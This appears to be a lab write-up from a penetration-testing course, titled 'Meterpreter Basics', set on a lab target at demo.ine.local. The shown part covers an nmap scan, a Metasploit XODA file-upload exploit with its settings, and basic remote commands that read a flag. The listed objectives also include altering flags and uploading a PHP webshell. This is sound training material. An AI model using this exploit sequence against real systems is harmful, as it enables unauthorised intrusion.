Meterpreter Basics

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Perform the following tasks to complete the lab:

Check the present working directory on remote (exploited) machine.
List the files present in present working directory of the remote machine.
Check the present working directory on local (attacker) machine.
List the files present in present working directory of the local machine.
Get the flag value present in /app/flag1 file.
Change the flag value present in /app/flag1, so that no one else can get the right flag.
Change the present working directory to a suspiciously named directory in /app and read the flag from a hidden file present in that directory.
Get the flag5.zip to local machine, open it using password 56784. The information given in the extracted file will give clue about the location of the another flag.
Delete the .zip file from the directory.
Print checksum of file mentioned in the extracted file (Refer to Q8).
Check the PATH environment variable on the remote machine.
There is a file with string “ckdo” in its name in one of the places included in PATH variable. Print the flag hidden in that file.
Change to tools directory on the local machine.
Upload a PHP webshell to app directory of the remote machine.

Tools

Nmap
Metasploit Framework

Writeup

nmap -sSVC demo.ine.local

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-git: 
|   192.19.162.3:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|_      https://github.com/fermayo/hello-world-lamp.git
|_http-title: XODA
3306/tcp open  mysql   MySQL 5.5.47-0ubuntu0.14.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0ubuntu0.14.04.1
|   Thread ID: 2
|   Capabilities flags: 63487
|   Some Capabilities: SupportsLoadDataLocal, SupportsTransactions, ODBCClient, LongColumnFlag, Support41Auth, Speaks41ProtocolOld, SupportsCompression, FoundRows, IgnoreSigpipes, LongPassword, ConnectWithDatabase, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, InteractiveClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: %(7z'N6_[/u$PEI}\3)s
|_  Auth Plugin Name: mysql_native_password
MAC Address: 02:42:C0:13:A2:03 (Unknown)

searchsploit xoda

msfconsole
use exploit/unix/webapp/xoda_file_upload
set rhosts demo.ine.local
set lhost 192.19.162.2
set targeturi /
run

Check remote working directory

pwd

List files in remote working directory

ls -la

Get flag from /app/flag1

cat /app/flag1

PreviousVulnerable SMTP Server NextUpgrading Command Shells To Meterpreter Shells

Last updated 5 days ago